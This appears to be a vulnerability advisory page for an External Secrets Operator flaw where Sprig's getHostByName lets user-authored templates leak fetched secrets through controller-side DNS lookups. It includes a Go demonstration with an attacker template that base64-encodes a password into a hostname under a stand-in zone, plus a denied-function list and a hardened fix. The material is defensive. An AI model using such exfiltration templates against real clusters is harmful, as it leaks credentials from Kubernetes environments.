EUVD-2026-22190

CVE-2026-34984 HIGH
Information Exposure (CWE-200)
2026-04-13 https://github.com/external-secrets/external-secrets GHSA-r2pg-r6h7-crf3
CVSS 4.0 base score: 7.1

CVSS Vector (NVD)

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector: Network (AV:N)
Attack Complexity: Low (AC:L)
Attack Requirements: None (AT:N)
Privileges Required: Low (PR:L)
User Interaction: None (UI:N)
Vulnerable System Impact: Confidentiality High (VC:H), Integrity None (VI:N), Availability None (VA:N)
Subsequent System Impact: Confidentiality None (SC:N), Integrity None (SI:N), Availability None (SA:N)
Threat, Environmental and Supplemental metrics: not defined (X)

Lifecycle Timeline

Apr 17, 2026 15:37 (vuln.today): Re-analysis queued
Apr 14, 2026 03:22 (NVD): CVSS changed to 7.1 (HIGH)
Apr 13, 2026 17:15 (vuln.today): Analysis generated

Description (NVD)

Summary

The v2 template engine in runtime/template/v2/template.go imports Sprig’s TxtFuncMap() and removes env and expandenv, but leaves getHostByName available to user-controlled templates. Because ESO executes templates inside the controller process, an attacker who can create or update templated ExternalSecret resources can trigger controller-side DNS lookups using secret-derived values, creating a DNS exfiltration primitive.

Impact

This is a confidentiality issue. In environments where untrusted or lower-trust users can author templated ExternalSecret resources and the controller can perform DNS resolution, fetched secret material can be exfiltrated through DNS without requiring direct outbound access from the attacker’s workload.
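The following Go program is an added illustration of the mechanism described above; it is not code from the External Secrets project. Sprig's TxtFuncMap() is replaced by a small constructed stand-in holding only the functions the example needs, and its getHostByName records the hostname it was asked to resolve instead of performing a real lookup, so the program runs offline. The secret value, the attacker template and the exfil.example zone are constructed for the example. It shows the func map pattern the advisory describes (env and expandenv deleted, getHostByName kept) rendering a template that pushes a secret-derived label into a controller-side lookup, the hardened map rejecting the same template at parse time, and an admission-style check that reports which denied functions a template references.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"strings"
	"text/template"
)

// Functions a user-authored template must never reach: env/expandenv read the
// controller's environment, getHostByName makes it resolve an arbitrary name.
var denied = []string{"env", "expandenv", "getHostByName"}

// funcMap is a constructed stand-in for sprig.TxtFuncMap() holding only what this
// example needs, minus the names in remove. record stands in for the real DNS
// lookup so the example runs offline and the caller can see what the controller
// would have resolved.
func funcMap(record func(host string), remove ...string) template.FuncMap {
	fm := template.FuncMap{
		"env":       func(string) string { return "" },
		"expandenv": func(s string) string { return s },
		"getHostByName": func(host string) string {
			record(host)
			return "203.0.113.10" // documentation address; Sprig would return a real lookup result
		},
		"b64enc": func(s string) string { return base64.StdEncoding.EncodeToString([]byte(s)) },
	}
	for _, name := range remove {
		delete(fm, name)
	}
	return fm
}

// The pattern the advisory describes (only env and expandenv removed) next to
// the hardened variant that removes every denied function.
func vulnerableFuncMap(record func(string)) template.FuncMap { return funcMap(record, "env", "expandenv") }
func hardenedFuncMap(record func(string)) template.FuncMap   { return funcMap(record, denied...) }

// render executes a user-supplied template against fetched secret data, as the
// controller does when materialising a templated Secret.
func render(fm template.FuncMap, text string, data map[string]string) (string, error) {
	t, err := template.New("es").Funcs(fm).Parse(text)
	if err != nil {
		return "", err
	}
	var sb strings.Builder
	if err := t.Execute(&sb, data); err != nil {
		return "", err
	}
	return sb.String(), nil
}

func nop(string) {}

// deniedFuncs is an admission-time check that needs no parse-tree walker:
// text/template rejects an undefined function at Parse, so parsing once with
// each denied name removed tells us exactly which denied functions the template
// references, wherever they appear (branches, nested pipelines, defines).
func deniedFuncs(text string) ([]string, error) {
	if _, err := template.New("scan").Funcs(funcMap(nop)).Parse(text); err != nil {
		return nil, err // not even valid with the full map
	}
	var hits []string
	for _, d := range denied {
		if _, err := template.New("scan").Funcs(funcMap(nop, d)).Parse(text); err != nil {
			hits = append(hits, d)
		}
	}
	return hits, nil
}

// Constructed sample (not from the advisory): a fetched secret and an attacker
// template that encodes it into a hostname under a zone the attacker serves.
var sampleData = map[string]string{"password": "s3cr3t"}

const exfilTemplate = `{{ getHostByName (printf "%s.exfil.example" (b64enc .password)) }}`

func main() {
	var resolved []string
	record := func(h string) { resolved = append(resolved, h) }
	out, err := render(vulnerableFuncMap(record), exfilTemplate, sampleData)
	fmt.Printf("vulnerable: out=%q err=%v resolved=%v\n", out, err, resolved)
	_, err = render(hardenedFuncMap(record), exfilTemplate, sampleData)
	fmt.Printf("hardened: err=%v\n", err)
	hits, _ := deniedFuncs(exfilTemplate)
	fmt.Printf("admission check flags: %v\n", hits)
}
```

With the vulnerable map the controller would have resolved czNjcjN0.exfil.example, the base64 of the fetched password prepended to an attacker-served zone; the attacker's workload needs no egress of its own, because the query leaves from the controller's resolver. With the hardened map the same template fails at Parse with a "function not defined" error before anything executes, which is why removing the function from the map (rather than filtering output) is the right fix. deniedFuncs reuses that parse-time check as an audit for templates already stored in ExternalSecret resources.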

Analysis (AI-generated)

DNS exfiltration in External Secrets Operator (ESO) allows authenticated Kubernetes users with ExternalSecret write permissions to leak secret material through controller-side DNS queries. The v2 template engine exposes Sprig's getHostByName function to user-controlled templates, enabling attackers to encode fetched secrets into DNS lookups performed by the ESO controller process. …

